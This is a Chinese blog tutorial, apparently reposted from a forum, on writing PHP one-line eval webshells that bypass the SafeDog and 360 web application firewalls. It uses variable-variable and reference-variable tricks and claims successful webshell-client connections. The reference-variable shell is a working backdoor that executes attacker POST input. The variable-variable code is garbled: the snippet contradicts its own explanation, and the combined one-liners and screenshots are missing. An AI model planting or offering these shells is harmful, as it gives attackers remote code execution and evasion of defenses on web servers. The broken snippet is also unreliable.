过安全狗php一句话,.[WEB]绕过安全狗与360PHP一句话的编写

来源;http://bbs.ichunqiu.com/thread-9012-1-1.html?from=ch

00x01安全狗的确是让人很头痛,尤其是在上传一句话或者写入一句话的时候,会被安全狗拦截从而拿不下shell。

当然,安全狗是最简单的一款waf,很容易就进行一个绕过。

00x02

对于绕过安全狗跟360,我姿势不多,但是却很实用为以下两种

1.#可变变量

2.#引用变量

00x03

##可变变量(菜刀可能报错)

复制代码

经常使用的人都知道,只是最简单的一句话,不过任何waf与规则

我们先来加入需要的函数

$a='b';

$b=$_POST['x'];

@eval($a);

复制代码

我们先来测试下是否被杀

4f6d4e9b4e40

可以看见,是成功过了安全狗,我们来测试下连接

4f6d4e9b4e40

并且成功可以连接

代码分析#

$a='b';

$b=$_POST['x'];

@eval($a);

?>

复制代码

我们来看第二行代码

$a='b';

复制代码

知道可变变量的人应该都能看懂吧,第三行$$a中的$a是b,也可以这么说$a替换成b。

继续看第三行

$b=$_POST['x'];

复制代码

根据第一行知道$$a就是$b,$b用来接收post 提交的数据

最后第四行

@eval($a);

复制代码

执行$$a相当于执行了$a也就是$b. 最后,我们整合成一句话

复制代码

总结

1#  可变变量比较灵活对于过狗也比较简单

2#  不过D盾只适合安全狗与360针对性比较高

00x04

##引用变量

复制代码

还是原始一句话,我先写出写好的代码

$a=$_POST['x'];

$b=&$a;

@eval($b);

?>

复制代码

我们继续测试下是否被杀,

4f6d4e9b4e40

可以看见,一样过了安全狗,我们继续测试下是否可以连接

4f6d4e9b4e40

可以看见,已经连接上了,并且可以进行操作。

##代码分析

$a=$_POST['x'];

$b=&$a;

@eval($b);

?>

复制代码

我们来看第二行代码

$a=$_POST['x'];

复制代码

$a用来接收post提交的数据

继续看第三行代码

$b=&$a;

复制代码

$b引用了$a的内存地址间接的相当于$b接收了post提交的数据

最后第四行代码:

@eval($b);

复制代码

执行$b。最后我们来整合成一句话

复制代码

总结(与可变变量一样)

1#  可变变量比较灵活对于过狗也比较简单

2#  不过D盾只适合安全狗与360针对性比较高

00x05

大总结

1#  了解其原理,一味的抄写在安全狗更新时无法能够独立编写

2#  活学活用,多种方式结合可写出各种变态一句话,从而达到持久等效果

3#  多多与人交流,交流乃学习不可缺少的根本,共享思路结合思路,便可以称为一个大牛。4#  安全狗只是一个很简单的waf,不能止步于此,低调发展寻求高傲的技术

00x06

1#当然,我只列出的是一部分,还有许多的方式,例如函数替换,关键字拆分,双变量等方式。

2#第一次写文章,可能写的不是很好,有建议者可以评论点出,万分感谢。

3#日后我会分享过waf注入的思路,请大家多多支持!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值